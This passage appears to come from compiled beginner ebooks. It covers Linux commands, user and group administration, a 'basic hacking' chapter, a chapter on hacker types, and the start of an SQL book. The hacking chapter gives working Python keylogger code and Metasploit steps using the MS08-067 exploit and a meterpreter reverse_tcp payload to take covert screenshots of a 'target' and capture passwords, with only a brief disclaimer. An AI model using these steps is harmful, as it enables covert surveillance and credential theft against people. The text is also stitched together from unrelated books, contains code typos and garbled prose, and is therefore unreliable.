symlink - dir1 to sym. Then I want to link sym to dir 2 instead. If I use -s
and -f together (-sf) it does not work. The option to us here is -n.
Unlinking
To remove the symlinks you can use the following commands.
- Syntax: unlink linkname
- Syntax: rm linkname
Creating Hard Links
Now we will look at creating hard links. Hard link creates a separate virtual
file. This file includes information about the original file and its location.
Example: ln test1.txt hard_link
Here we do not see any symbolic representations. That means the file is an
actual physical file. And if you look at the inode, you will see both files
having the same inode number.
Symbolic link does not change this increment of hard link number for each
file. See the following example.
Now here you can see the hard_link has reduced to its links to 1. The
symbolic link displays a broken or what we call the orphan state.
File Renaming
Next, we will look at how file renaming works. For this the command
used is mv. mv stands for “move”.
Syntax: mv [options] source dest
Example: mv LICENSE LICENSE_1
You must be cautious when you use this command. If you do the following,
what would happen?
One advantage of this command is that you can move and rename the file all
together, especially when you do it from one location to another.
Example: Moving /home/jan/Desktop/Y/snapt to /Desktop while renaming it
so Snap. This is similar to a cut and paste on Windows except for the
renaming part.
Example: mv /home/jan/Desktop/Y/snapt/ ./Snap
Removing Files
To remove files, use rm command. rm command does not ask you if you
want to delete the file. Therefore, you must use the -i option with it.
Syntax: rm [OPTION]... FILE...
Managing Directories
There is a set of commands to create and remove directories.
To create a directory, use the mkdir command.
To remove a directory, use the rmdir command.
Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...]
rmdir [-p] [-v | –verbose] [–ignore-fail-on-non-empty] [directories …]
Example: Creating a set of directories with the mkdir command. To create a
tree of directories you must use -p. If you try without it, you won’t succeed.
You have to remove the files first in order to remove the directory. In this
case, you can use another command to do this recursively.
Example: rm -rf /Temp
Creating files with cat is also possible. The following command can create a
file.
Example: cat >testy
The cat command can be used with 2 familiar commands we used earlier.
The less and more commands.
Example: cat test.txt | more
1. PATH
2. PS1
3. TMPDIR
4. EDITOR
5. DISPLAY
Try echoing there values, but don’t change them, as they will affect the
working of your Linux Installation:
[root@archserver ~]# echo $PS1
[\u@\h \W]\$
[root@archserver ~]# echo $EDITOR
-g, --gid GROUP The primary group of the user can be specified using
this option
-a, --append The option is used with the -G option to add the user
to all specified supplementary groups without
removing the user from other groups
-m, --move-home You can move the location of the user’s home
directory to a new location by using the -d option
-s, --shell SHELL The login shell of the user is changed using this
option
-L, --lock Lock a user account using this option
● userdel username deletes the user from the /etc/passwd file but does not
delete the home directory of that user.
userdel -r username deletes the user from /etc/passwd and deletes their home
directory along with its content as well.
● id displays the user details of the current user, which includes the UID
of the user and group memberships.
id username will display the details of the user specified, which includes the
UID of the user and group memberships.
● passwd username is a command that can be used to set the user’s initial
password or modify the user’s existing password.
The root user has the power to set the password to any value. If the criteria
for password strength is not met, a warning message will appear, but the root
user can retype the same password and set the password for a given user
anyway.
If it is a regular user, they will need to select a password, which is at least 8
characters long, should not be the same as the username, or a previous word,
or a word that can be found in the dictionary.
● UID Ranges are ranges that are reserved for specific purposes in
Red Hat Enterprise Linux 7
UID 0 is always assigned to the root user.
UID 1-200 are assigned by the system to system processes in a static
manner.
UID 201-999 are assigned to the system process that does not own any file
in the system. They are dynamically assigned whenever an installed
software request for a process.
UID 1000+ are assigned to regular users of the system.
Managing Group Accounts
In this section, we will learn about how to create, modify, and delete group
accounts that have been created locally.
It is important that the group already exists before you can add users to a
group. There are many tools available on the Linux command line that will
help you to manage local groups. Let us go through these commands used for
groups one by one.
● groupadd groupname is a command that if used without any options
creates a new group and assigns the next available GID in the group range
and defines the group in the /etc/login.defs file
You can specify a GID by using the option -g GID
[student@desktop ~]$ sudo groupadd -g 5000 ateam
The -r option will create a group that is system specific and assign it a
GID belonging to the system range, which is defined in the /etc/login.defs
file.
[student@desktop ~]$ sudo groupadd -r professors
● groupmod command is used to modify the parameters of an existing
group such as changing the mapping of the groupname to the GID. The -n
option is used to specify a new name to the group.
[student@desktop ~]$ sudo groupmod -n professors lecturers
The -g option is passed along with the command if you want to assign a
new GID to the group.
[student@desktop ~]$ sudo groupmod -g 6000 ateam
After entering this command, you will see a list of files that appears like this
example:
Take note that there are numerous programs that are set with a suid
permission because they require it. However, you may want to check the
entire list to make sure that there are no programs that have odd suid
permissions. For example, you may not want to have suid programs located
in your home directory.
Here is an example: typing the ls –l /bin/su will give you the following
result:
The character s in the permission setting alluded to the owner (appears as –
rws) shows that the file /bin/su has suid permission. This means that the su
command, which allows any user to have superuser privileges, can be used
by anyone.
Chapter 12 Some Basic Hacking with Linux
Now that you have hopefully gotten used to the Linux system and have some
ideas of how it works and such, it is a good time to learn a little bit about
hacking with Linux. whether you are using this system on your own or you
have it set up with a network of other people, there are a few types of hacking
that you may find useful to know how to do. This chapter is going to spend
some time exploring some basic hacking endeavors on the Linux system.
We want to spend some time looking at how we can work with the Linux
system to help us complete some of the ethical hacking that we would like to
do. While we are able to do some hacking with the help of Windows and
Mac, often, the best operating system to help us out with all of this is going to
be the Linux operating system. It already works on the command line, which
makes things a bit easier and will have all of the protection that you need as
well. And so, we are going to spend a bit of our time taking a closer look at
how the Linux system is going to be able to help us out with some of the
hacking we want to accomplish.
There are a lot of reasons that hackers are going to enjoy working with Linux
over some of the other operating systems that are out there. The first benefit
is that it is open source. This means that the source code is right there and
available for you to use and modify without having to pay a lot of fees or
worry that it is going to get you into trouble. This open-source also allows
you to gain more access to it, share it with others and so much more. And all
of these can be beneficial to someone who is ready to get started with
hacking as well.
The compatibility that comes with Linux is going to be beneficial for a
hacker as well. This operating system is going to be unique in that it is going
to help us support all of the software packages of Unix and it is also able to
support all of the common file formats that are with it as well. This is
important when it comes to helping us to work with some of the hacking
codes that we want to do later on.
Linux is also designed to be fast and easy to install. There are a number of
steps that we had to go through in order to get started. But when compared to
some of the other operating systems this is not going to be that many and it
can really help you to get the most out of this in as little time as possible.
You will quickly notice that most of the distributions that you are able to do
with Linux are going to have installations that are meant to be easy on the
user. And also, a lot of the popular distributions of Linux are going to come
with tools that will make installing any of the additional software that you
want as easy and friendly as possible too. Another thing that you might notice
with this is that the boot time of the operating system of Linux is going to be
faster than what we see with options like Mac and Windows, which can be
nice if you do not want to wait around all of the time.
When you are working on some of the hacks that you would like to
accomplish, the stability of the program is going to matter quite a bit. You do
not want to work with a system that is not all that stable, or that is going to
fall apart on you in no time. Linux is not going to have to go through the
same periodic reboots like others in order to maintain the level of
performance that you would like and it is not going to slow down or freeze up
over time if there are issues with leaks in the memory and more. You are also
able to use this operating system for a long time to come, without having to
worry about it slowing down or running into some of the other issues that the
traditional operating systems will need to worry about.
For someone who is going to spend their time working with ethical hacking,
this is going to be really important as well. It will ensure that you are able to
work with an operating system that is not going to slow down and cause
issues with the protections that you put in place on it. And you will not have
to worry about all of the issues that can come up with it being vulnerable and
causing issues down the line as well. It is going to be safe and secure along
the way, so that you are able to complete your hacks and keep things safe,
without having to worry about things not always working out the way that we
would hope.
Another benefit that we will spend a bit of time on is how friendly the Linux
network is overall. As this operating system is an option that is open source
and is contributed by the team over the internet network, it is also able to
effectively manage the process of networking all of the time. And it is going
to help with things like commands that are easy to learn and lots of libraries
that can be used in a network penetration test if you choose to do this. Add on
that the Linux system is going to be more reliable and it is going to make the
backup of the network more reliable and faster and you can see why so many
users love to work with this option.
As a hacker, you will need to spend some of your time multitasking to get all
of the work done. A lot of the codes and more that you want to handle in
order to do a hack will need to have more than one thing going at a time, and
Linux is able to handle all of this without you having to worry about too
much going on or the computer freezing upon you all of the time.
In fact, the Linux system was designed in order to do a lot of things at the
same time. This means that if you are doing something large, like finishing
up a big printing job in the background, it is not really going to slow down
some of the other work that you are doing. Plus, when you need to handle
more than one process at the same time, it is going to be easier to do on
Linux, compared to Mac or Windows, which can be a dream for a hacker.
You may also notice that working with the Linux system is a bit different and
some of the interactions that you have to take care of are not going to be the
same as what we found in the other options. For example, the command-line
interface is going to introduce us to something new. Linux operating systems
are going to be specifically designed around a strong and highly integrated
command-line interface, something that the other two operating systems are
not going to have. The reason that this is important is that it will allow
hackers and other users of Linux to have more access and even more control,
over their system.
Next on the list is the fact that the Linux system is lighter and more portable
than we are going to find with some of the other operating systems out there.
This is a great thing because it is going to allow hackers with a method that
will make it easier to customize the live boot disks and drives from any
distribution of Linux that they would like. The installation is going to be fast
and it will not consume as many resources in the process. Linux is light-
weight and easy to use while consuming fewer resources overall.
The maintenance is going to be another important feature that we need to
look at when we are trying to do some ethical hacking and work with a good
operating system. Maintaining the Linux operating system is going to be easy
to work with. All of the software is installed in an easy manner that does not
take all that long and every variant of Linux has its own central software
repository, which makes it easier for the users to search for their software and
use the kind that they would like along the way.
There is also a lot of flexibility when it comes to working with this kind of
operating system. As a hacker, you are going to need to handle a lot of
different tools along the way. And one of the best ways that we are able to do
this is to work with an operating system that allows for some flexibility in the
work that we are doing. This is actually one of the most important features in
Linux because it allows us to work with embedded systems, desktop
applications and high-performance server applications as well.
As a hacker, you want to make sure that your costs are as low as possible. No
one wants to get into the world of ethical hacking and start messing with
some of those codes and processes and then find out that they have to spend
hundreds of dollars in order to get it all done. And this is where the Linux
system is going to come into play. As you can see from some of our earlier
discussions of this operating system, it is going to be an open-source
operating system, which means that we are able to download it free of cost.
This allows us to get started with some of the hacking that we want to do
without having to worry about the costs.
If you are working with ethical hacking, then your main goal is to make sure
that your computer and all of the personal information that you put into it is
going to stay safe and secure all of the time. This is going to be a command-
line to keep other hackers off and will make it so that you don’t have to
worry about your finances or other issues along the way, either. And this is
also where the Linux operating system is going to come into play to help us
out.
One of the nice things that we are going to notice when it comes to the Linux
operating system is that it is seen as being less vulnerable than some of the
other options. Today, most of the operating systems that we are able to
choose from, besides the Linux option, are going to have a lot of
vulnerabilities to an attack from someone with malicious intent along the
way.
Linux, on the other hand, seems to have fewer of these vulnerabilities in
place from the beginning. This makes it a lot nicer to work with and will
ensure that we are going to be able to do the work that we want on it, without
having a hacker getting. Linux is seen as one of the most secure out of all the
operating systems that are available and this can be good news when you are
starting out as an ethical hacker.
The next benefit that we are going to see when it comes to working with the
Linux operating system over some of the other options, especially if you are a
hacker, is that it is going to provide us with a lot of support and works with
most of the programming languages that you would choose to work on when
coding. Linux is already set up in order to work with a lot of the most popular
programming languages. This means that many options like Perl, Ruby
Python, PHP< C++ and Java are going to work great here.
This is good news for the hacker because it allows them to pick out the option
that they like. If you already know a coding language or there is one in
particular that you would like to use for some of the hacking that you plan to
do, then it is likely that the Linux system is going to be able to handle this
and will make it easy to use that one as well.
If you want to spend some of your time working on hacking, then the Linux
system is a good option. And this includes the fact that many of the hacking
tools that we are working with are going to be written out in Linux. Popular
hacking tools like Nmap and Metasploit, along with a few other options, are
going to be ported for Windows. However, you will find that while they can
work with Windows, if you want, you will miss out on some of the
capabilities when you transfer them off of Linux.
It is often better to leave these hacking tools on Linux. This allows you to get
the full use of all of them and all of the good capabilities that you can find
with them, without having to worry about what does and does not work if you
try to move them over to a second operating system. These hacking tools
were made and designed to work well in Linux, so keeping them there and
not trying to force them into another operating system allows you to get the
most out of your hacking needs.
And finally, we are able to take a quick look at how the Linux operating
system is going to take privacy as seriously as possible. In the past few years,
there was a lot of information on the news about the privacy issues that
would show up with the Windows 10 operating system. Windows 10 is set up
to collect a lot of data on the people who use it the most. This could bring up
some concerns about how safe your personal information could be.
This is not a problem when we are working with Linux. This system is not
going to take information, you will not find any talking assistants to help you
out and this operating system is not going to be around, collecting
information and data on you to have some financial gain. This all can speak
volumes to an ethical hacker who wants to make sure that their information
stay safe and secure all of the time.
As you can see here, there are a lot of benefits that are going to show up
when it is time to work with the Linux system. We can find a lot of examples
of this operating system and all of the amazing things that it is able to do,
even if we don’t personally use it on our desktop or laptop. The good news is
that there are a lot of features that are likely to make this operating system
more effective and strong in the future, which is perfect when it comes to
doing a lot of tasks, including the hacking techniques that we talked about.
Making a key logger
The first thing we are going to learn how to work with is a key logger. This
can be an interesting tool because it allows you to see what keystrokes
someone is making on your computer right from the beginning. Whether you
have a network that you need to keep safe and you want to see what others
are the system are typing out, or if you are using a type of black hat hacking
and are trying to get the information for your own personal use, the key
logger is one of the tools that you can use to make this work out easily for
you.
Now there are going to be a few different parts that you will need to add in
here. You can download a key logger app online (git is one of the best ones to
use on Linux for beginners), and while this is going to help you to get all the
characters that someone is typing on a particular computer system, it is not
going to be very helpful. Basically here you are going to get each little letter
on a different line with no time stamps or anything else to help you out.
It is much better to work this out so that you are getting all the information
that you need, such as lines of text rather than each letter on a different line
and a time stamp to tell you when each one was performed. You can train the
system to only stop at certain times, such as when there is a break that is
longer than two seconds, and it will type in all the information that happens
with the keystrokes at once rather than splitting it up. A time stamp is going
to make it easier to see when things are happening and you will soon be able
to see patterns, as well as more legible words and phrases.
When you are ready to bring all of these pieces together, here is the code that
you should put into your command prompt on Linux in order to get the key
logger all set up:
import pyxhook
#change this to your log file’s path
log_file = ‘/home/aman/Desktop/file.log’
#this function is called every time a key is pressed
def OnKeyPress(event):
fob = open(log_file, ‘a’)
fob.write(event.Key)
fob.writer(‘\n’)
if event.ASCII==96: #96 is the asci value of the grave key
fob.close()
new_hook.cancel()
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session
new_hook.start()
Now you should be able to get a lot of the information that you need in order
to keep track of all the key strokes that are going on with the target computer.
You will be able to see the words come out in a steady stream that is easier to
read, you will get some time stamps, and it shouldn’t be too hard to figure out
where the target is visiting and what information they are putting in. Of
course, this is often better when it is paired with a few other options, such as
taking screenshots and tracking where the mouse of the target computer is
going in case they click on links or don’t type in the address of the site they
are visiting, and we will explore that more now!
Getting screenshots
Now, you can get a lot of information from the key strokes, but often these
are just going to end up being random words with time stamps accompanying
them. Even if you are able to see the username and password that you want, if
the target is using a link in order to get their information or to navigate to a
website, how are you supposed to know where they are typing the
information you have recorded?
While there are a few codes that you can use in order to get more information
about what the target is doing, getting screenshots is one of the best ways to
do so. This helps you to not only get a hold of the username and passwords
based on the screenshots that are coming up, but you are also able to see what
the target is doing on the screen, making the hack much more effective for
you.
Don’t worry about this sounding too complicated. The code that you need to
make this happen is not too difficult and as long as you are used to the
command prompt, you will find that it is pretty easy to get the screenshots
that you want. The steps that you need to take in order to get the screenshots
include:
Step1: set the hack up
First, you will need to select the kind of exploit that you need to use. A good
exploit that you should consider using is the MS08_067_netapi exploit. You
will need to get this one onto the system by typing:
msf > use exploit/windows/smb/ms08_067_netapi
Once this is on the system, it is time to add in a process that is going to make
it easier to simplify the screen captures. The Metasploit’s Meterpreter
payload can make things easier to do. in order to get this to set up and load
into your exploit, you will need type in the following code:
msf> (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp
The following step is to set up the options that you want to use. A good place
to start is with the show options command. This command is going to let you
see the options that are available and necessary if you would like to run the
hack. To get the show options command to work well on your computer, you
will need to type in the following code:
msf > (ms08_067_netapi) show options
At this point, you should be able to see the victim, or the RHOST, and the
attacker or you, the LHOST, IP addresses. These are important to know when
you want to take over the system of another computer because their IP
address will let you get right there. The two codes that you will need in order
to show your IP address and the targets IP address so that you can take over
the targets system includes:
msf > (ms08_067_netapi) set RHOST 192.168.1.108
msf > (ms08_067_netapi) set LHOST 192.168.1.109
Now if you have gone through and done the process correctly, you should be
able to exploit into the other computer and put the Meterpreter onto it. The
target computer is going to be under your control now and you will be able to
take the screenshots that you want with the following steps.
Step 2: Getting the screenshots
With this step, we are going to work on getting the screenshots that you want.
But before we do that, we want to find out the process ID, or the PID, that
you are using. To do this, you will need to type in the code:
meterpreter > getpid
The screen that comes up next is going to show you the PID that you are
using on the targets computer. For this example we are going to have a PID
of 932, but it is going to vary based on what the targets computer is saying.
Now that you have this number, you will be able to check which process this
is by getting a list of all the processes with the corresponding PIDs. To do
this, you will just need to type in:
meterpreter > ps
When you look at the PID 932, or the one that corresponds to your targets
particular system, you will be able to see that it is going to correspond with
the process that is known as svrhost.exe. Since you are going to be using a
process that has active desktop permissions in this case, you will be ready to
go. If you don’t have the right permissions, you may need to do a bit of
migration in order to get the active desktop permissions. Now you will just
need to activate the built in script inside of Meterpreter. The script that you
need is going to be known as espia. To do this, you will simply need to type
out:
meterpreter > use espia
Running this script is just going to install the espia app onto the computer of
your target. Now you will be able to get the screenshots that you want. To get
a single screenshot of the target computer, you will simply need to type in the
code:
meterpreter > screengrab
When you go and type out this code, the espia script that you wrote out is
basically going to take a screenshot of what the targets computer is doing at
the moment, and then will save it to the root user’s directory. You will then
be able to see a copy of this come up on your computer. You will be able to
take a look at what is going on and if you did this in the proper way, the
target computer will not understand that you took the screenshots or that you
aren’t allowed to be there. You can keep track of what is going on and take as
many of the different screenshots that you would like.
These screenshots are pretty easy to set up and they are going to make it
easier than ever to get the information that you need as a hacker. You will not
only receive information about where the user is heading to, but also what
information they are typing into the computer.
Keep in mind that black hat hacking is usually illegal and it is not encouraged
in any way. While the black hat hackers would use the formulas above in
order to get information, it is best to stay away from using these tactics in an
illegal manner. Learning these skills however can be a great way to protect
yourself against potential threats of black hat hackers. Also, having hacking
skills allows you to detect security threats in the systems of other people.
Being a professional hacker can be a highly lucrative career, as big
companies pay a lot of money to ensure that their system is secure. Hack-
testing systems for them is a challenging, and fun way to make a living for
the skilled hackers out there!
Chapter 13 Types of Hackers
All lines of work in society today have different forms. You are either blue
collar, white collar, no collar…whatever. Hacking is no different. Just as
there is different kinds of jobs associated with different kinds of collar colors,
the same goes for hacking.
Hackers have been classified into many different categories, black hat, white
hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a
better understanding as to what grey hacking is, let’s first take a look at these
other kinds of hacking, so you can get a feel for what it is hackers do, or can
do, when they are online.
Newbies
The best place to start anything is at the beginning, which is why we are
starting with the newbie hackers.
The problem with a lot of newbie hackers is that they think they have it all
figured out when they really don’t. The idea of hacking is really only
scratching the surface when it comes to everything that is involved, and it is
not at all uncommon for people who want to get into it to get overwhelmed
when they see what really needs to be learned.
Don’t let that discourage you, however, you are able to learn it all, it just
takes time and effort on your part. Borrow books and get online. Look up
what needs to be and remember it. Don’t rush yourself. You need to learn,
and really learn. Anything that you don’t remember can end up costing you
later.
There are immediate reactions when it comes to the real world of hacking,
and sitting there trying to look up what you should have already known is not
going to get you far as a hacker. If you want to be good at what you do, then
take the time required to be good at it.
Don’t waste your time if you don’t think you really want to learn it, because
it is going to take a lot of your concentration to get to the heart of the matter.
Don’t get me wrong, it is more than worth it, but if you are only looking into
it for curiosity sake, don’t do it unless knowing really means that much to
you.
Sure there are those that kind of know what they are doing, or they can get
into their friend’s email account, but that is not the hacking I am talking
about here.
I want you to become a real life, capable hacker, and that isn’t going to
happen unless you are willing to take the time needed to learn it, and put
forth the effort to learn it.
You have to remember that any hacker that is in existence had to start as a
newbie hacker, and build up their skills from there. Now, as fast they built
those skills depended greatly on how much time and effort they put into
working on it, but don’t worry, you will get the hang of things, and while you
have to start as a newbie, you will have Grey Hat status soon enough.
Elites
As with the newbie hackers, elite hackers can be any kind of hacker, whether
that be good or bad. What makes them elite is the fact they are good at what
they do, and they know it.
There is a lot of respect for elite hackers online. Just like with elite anything,
they know what they are doing, and they know that others can’t challenge
them unless they too know how to handle themselves.
There is a level of arrogance that goes with the status, but it is well deserved.
Anyone can stop at second best, but it takes true dedication to reach the top.
An elite hacker can use their powers for good or bad, but they are a force to
be reckoned with either way. They know the way systems work, how to work
around them, and how to get them to do what they want them to do.
If you have a goal of becoming an elite hacker, you do have your work cut
out for you, but don’t worry, you will get there. It only takes time and effort
to get this top dog status, and it comes to those who want it.
No one ‘accidently’ achieves elite status, it is something that they had to
work for, but it is definitely worth all of the time and effort that is put into it.
As an elite hacker, you won’t have to worry about whatever system you run
into, you will know what is coming, and how you can work around it, it just
comes with the line of work.
Hacktivists
Hacktivist hackers use their skills to promote a social or political agenda.
Sometimes they are hired by specific groups to get into places online and
gather information, sometimes they work all on their own.
The point of this kind of hacking is to make one political party look bad, and
the one that the hacker promotes to look good.
Then, they either publish it elsewhere online, or they pass it along so others
can see what the person has done or what they are accused of doing. It is a
way for politicians to make jabs at each other, and it isn’t really playing the
game fairly.
The hacker then is either payed by the party that hired them, or, if they are
working for themselves, they get to see the results of what they posted about
the politician.
The list of hackers and what they do is one that goes on and on, but they all
can ultimately fit into three categories, being the black hat, white hat, and
grey hats. No matter what kind of hacker they are on top of it, these are the
three realms that are really all encompassing.
This is because these are not only hackers in and of themselves, but they are
also characteristics of every king of hacker out there. Whether they are doing
things for good, for bad, or doing good things without permission, these are
really what hacking comes down to.
Black hat
The black hat hacker is likely the most famous of the hacking world, or
rather, infamous. This is the line of hacking that movies tend to focus on, and
it is the line of hacking that has given all hacking a bad name.
A black hat hacker is a hacker that is getting into a system or network to
cause harm. They always have malicious intent, and they are there to hurt and
destroy. They do this by either stealing things, whether it be the person’s
information, the network’s codes, or anything else they find that is valuable
to them, or they can do it by planting worms and viruses into the system.
There have been viruses planted into various systems throughout history,
causing hundreds of thousands of dollars’ worth of damage, and putting
systems down for days.
Viruses are programs that hackers create, then distribute, that cause havoc on
whatever they can get a grip on. They often times disguise themselves to look
like one thing, and they prompt you to open them in whatever way they can.
Then, once you do open the link, they get into the hard drive of your system
and do whatever they want while they are in there. Many viruses behave like
they have a mind of their own, and you would be surprised at the harm they
can cause.
There is a certain kind of virus, known as a ‘backdoor’ virus, which allows its
sender to then have access to and control of whatever system it has planted
itself into. It is as though the person who owns the system is nothing more
than a bystander who can do nothing but watch as the virus takes its toll on
the system.
Hackers will use these viruses for a number of reasons, and none of them are
very good for you. When a hacker has access to your computer, they can then
do whatever they like on there.
They can get into your personal information, and use that for their own gain.
They can steal your identity, they can do things that are illegal while they are
on your computer, and thus make it look like you were the one who did it,
and get out of the suspicion by passing all the blame onto you.
These are really hard viruses to get rid of, and it is of utmost importance that
you do whatever you can to protect yourself on the outset to make sure you
don’t get one of these viruses. However, if you do happen to get one, there is
hope. You may have to get rid of a lot of your system, or close it down and
restart it entirely, but it is always better to do that then to let a hacker have
access to anything you are doing.
Black hat hackers are malicious. They only do what they do to harm others
and cause mischief. It is unfortunate that they do what they do, as this is what
made hacking fall under a bad light, but there is hope, because wherever there
is a bad thing, there is also some good to be found, and that good comes in
the form of the white and grey hat hackers.
b. White hat
The white hat hacker and the grey hat hacker are really similar, but there are
key differences that make them separate categories. The white hat hacker is a
person who is hired by a network or company to get into the system and
intentionally try to hack it.
The purpose of this is to test the system or network for weakness. Once they
are able to see where hackers can get in, they can fix it and make it more
difficult for the black hat hackers to break in.
They often do this through a form of testing known as Penetration Testing,
but we will look more on that later. White hat hackers always have
permission to be in the system they are in, and they are there for the sole
purpose of looking for vulnerabilities.
There is a high enough demand for this line of work that there are white hat
hackers that do it for a full time job. The more systems go up, and more
hackers are going to try to break into them. The more hackers that try to do
that, the more companies are going to need white hat hackers to keep them
out.
Companies aren’t too picky on who they hire to work for them, either, so it is
remarkable that so many hackers will choose to go down the black hat path.
They could be making decent wages by working for people and getting paid
for what they do, but unfortunately not many people see it this way, and they
would rather hack for their own selfish gain than to do what would help
others.
To put it simply, however, it can be broken down to a very basic relationship.
Black hackers try to get in, white hackers try to keep them out. Sometimes
the black hats have the upper hand, then there are times when it goes to the
whites.
It is like a codependent relationship of villain and super hero, where you are
rooting for one but the other still manages to get what they want every once
in a while.
It is a big circle that works out in the end. Of course it would be a lot easier if
black hat hackers would stop breaking into the systems in the first place, but
unfortunately that isn’t going to happen.
c. Grey hat
The world is often portrayed as being full of choices that are either right or
wrong. You can do it one way, or you can do it any way but that one right
way…thus making you wrong.
Right and wrong, black and white. Yet…what about those exceptions to the
rule? There is an exception to pretty much every rule in existence, and
hacking is no exception. Grey hat hackers fall into this realm.
Whether they are right to do what they do or wrong to do what they do is up
to the individual to decide, because it is a grey area.
To clarify what I mean, think about it this way. Black hat hackers get into
networks without permission to cause harm. That is bad. Very bad. White hat
hackers get into systems with permission to cause protection. That is good.
Very good.
But then you have the grey hat hackers. Grey hat hackers get into a system
without permission…which is bad, but they get into that system to help the
company or network…which is good.
So, in a nutshell, grey hat hackers use bad methods to do good things. Which,
in turn, should make the whole event a good thing. Many people feel that it is
the grey hat hackers that do the best job of keeping the black hat hackers at
bay, but there are still those that argue the grey hats should not do what they
do because they have no permission to do it.
What is important and universal is the fact that a grey hat hacker never does
anything malicious or bad to a system, in fact, they do every bit as good as
the white hat hackers for those who are in charge of the network, but they do
it for free.
In a way, the grey hat hackers can be considered the robin hoods of hacking,
doing what they can to help people, unasked, and unpaid, and largely without
a ‘thank you’ even.
Conclusion
So you’ve worked through my book. Congratulations! You have learnt all
you need to learn to become a perfect Linux command line ninja. You have
acquired powerful and really practical skills and knowledge. What remains is
a little experience. Undoubtedly, your bash scripting is reasonably good now
but you have to practice to perfect it.
This book was meant to introduce you to Linux and the Linux command line
right from scratch, teach you what you need to know to use it properly and a
bit more to take you to the next level. At this point, I can say that you are on
your way to doing something great with bash, so don’t hang your boots just
yet.
The next step is to download Linux (if you haven’t done so yet) and get
started with programming for it! The rest of the books in this series will be
dedicated to more detailed information about how to do Linux programming,
so for more high-quality information, make sure you check them out.
SQL COMPUTER PROGRAMMING
FOR BEGINNERS:
LEARN THE BASICS OF SQL
PROGRAMMING WITH THIS
STEP-BY-STEP GUIDE IN A
MOST EASILY AND
COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING
PRACTICAL EXERCISE.
JOHN S. CODE
What is a Database?
Database can be said to be a place reserved to store and also process
structured information. Database can also be said to be a systematic
compilation/ collection of data. It is not a rigid platform, information stored
in a Database can also be manipulated, modified or adjusted when the need
arises. Database also supports the retrieval of stored information or data for
further use. Database has many forms that store and organize information
with the use of different structures. In a nutshell, data management becomes
easy with databases.
For instance,
An online telephone directory would certainly use database for storage of
data pertaining to phone numbers, people, as well as other contact details.
Also, an electricity service provider will need a database to manage billing
and other client related concerns. Database also helps to handle some
discrepancies in data among other issues.
Furthermore, the global and far-flung social media platform known as
Facebook. Which has a lot of members and users connected across the world.
Database is needed to store all the information of users, manipulate and also
present data related to users of this platform and their online friends. Also,
database helps to handle various of activities of users’ birthday, anniversary
among others, as well as advertisements, messages, and lots more.
In addition, most businesses depend absolutely on database for their daily
operation. For complex multinationals database is needed to take inventory,
prepare payroll for staff, process orders from clients, transportation, logistics,
and shipping which often requires tracking of goods. All these operations are
made easy because of a well-structured data base.
It can go on and on providing innumerable examples of database usage.
What is a Database Management System (DBMS)?
But how can you access the data in your database? This is the function of
Database Management System (DBMS). DBMS can then be said to be a
collection of programs which enables its users to gain access to the
information on the database, manipulate data, as well as reporting or
representation of data. Database Management System also helps to control
and restrict access to the database.
Database Management Systems was first implemented in 1960s and it cannot
be said to be a new concept. From history, Charles Bachmen's Integrated
Data Store (IDS) is the first ever Database Management Systems. After some
time, technologies evolved speedily and before long wide usage and diverse
functionalities of databases have been increased immeasurably.
Types of DBMS
There are four different types of DBMS which are;
Hierarchical
Network DBMS
Object-Oriented DBMS
Relational DBMS
Hierarchical- which is rarely used nowadays and usually supports the
"parent-child" relationship of storing data.
Network DBMS - this type of DBMS employs many-to-many relationships.
And this usually results in very complex database structures. An example of
this DBMS is the RDM (Raima Database Manager) Server.
Object-Oriented DBMS - new data types employ this DBMS. The data to be
stored are always in form of objects. An example of this DBMS is the
TORNADO.
Relational DBMS (RDBMS) - This is a type of Database Management
System that defines database relationships in form of tables, which is also
known as relations. For instance, in a logistics company with a database that
is designed for the purpose of recording fleet information, for effectiveness,
you can include a table that has list of employees and another table which
contains vehicles used by the employee. The two are held separately since
their information is different.
Unlike other Database Management Systems such as Network DBMS, the
RDBMS does not support many-to-many relationships. Relational Database
Management System do not support all data types, they usually have already
pre-defined data types which they can support. The Relational Database
Management System is still the most popular DBMS type in the market
today. Common examples of relational database management systems
include Oracle, MySQL, as well as Microsoft SQL Server database.
Tables
Indexes
Keys
Constraints
Views
Popular Relational Database Management Systems
There are some popular relational database management systems, and they
will be discussed in this chapter.
1. MySQL
This is the most popular open source SQL database which is usually used for
development of web application. The main benefit of this is that it is reliable,
inexpensive and also easy to use. It is therefore widely used by a broad
community of developers over the years. The MySQL has been in used since
1995.
One of the disadvantages, however, is that it does not contain some recent
features that most advanced developers would like to use for better
performance. The outcome is also poor when scaling and the open source
development has also lagged since MySQL has been taken over by Oracle.
2. PostgreSQL
This is one of the open source SQL databases which is independent of any
corporation. It is also used basically for development of web application.
Some of the advantages of PostgreSQL over MySQL is that it is also easy to
use, cheap and used by a wide community of developer. In addition, foreign
key support is one of the special features of the PostgreSQL. And it does not
require complex configuration.
On the other hand, it is led popular that the MySQL and this makes it hard to
access, it is also slower than the MySQL.
3. Oracle DB
The code for Oracle Database is not open sourced. It is owned by Oracle
Corporation. It is a Database employed by most multinational around the
world especially top financial institutions such as banks. This is because it
offers a powerful combination of comprehensive, technology, and pre-
integrated business applications. It also has some unique functions built in
specifically for banks.
Although it is not free to use by anyone, it can be very expensive to acquire.
4. SQL Server
This is owned by Microsoft and it is not open sourced. It is mostly used by
large enterprise and multinationals. Well, there is a free version for trial
where you can test the features but for bogger features. Then, it becomes
expensive to use. This test version is called Express.
5. SQLite
This is a very popular open source SQL database. It has the ability to store an
entire database just in one file. It has a major advantage of SQLite which is
its ability to save or store data locally without necessarily using a server.
It is a popular choice for companies that use cellphones, MP3 players, PDAs,
set-top boxes, and other electronic gadgets.
Chapter 2 SQL Basics
The SQL (the Structured Query Language, Structured Query Language)
is a special language used to define data, provide access to data and their
processing. The SQL language refers to nonprocedural languages - it only
describes the necessary components (for example, tables) and the desired
results, without specifying how these results should be
obtained. Each SQL implementation is an add-on on the database engine,
which interprets SQL statements and determines the order of accessing the
database structures for the correct and effective formation of the desired
result.
SQL to Work with Databases?
To process the request, the database server translates SQL commands into
internal procedures. Due to the fact that SQL hides the details of data
processing, it is easy to use.
You can use SQL to help out in the following ways:
SQL helps when you want to create tables based on the data
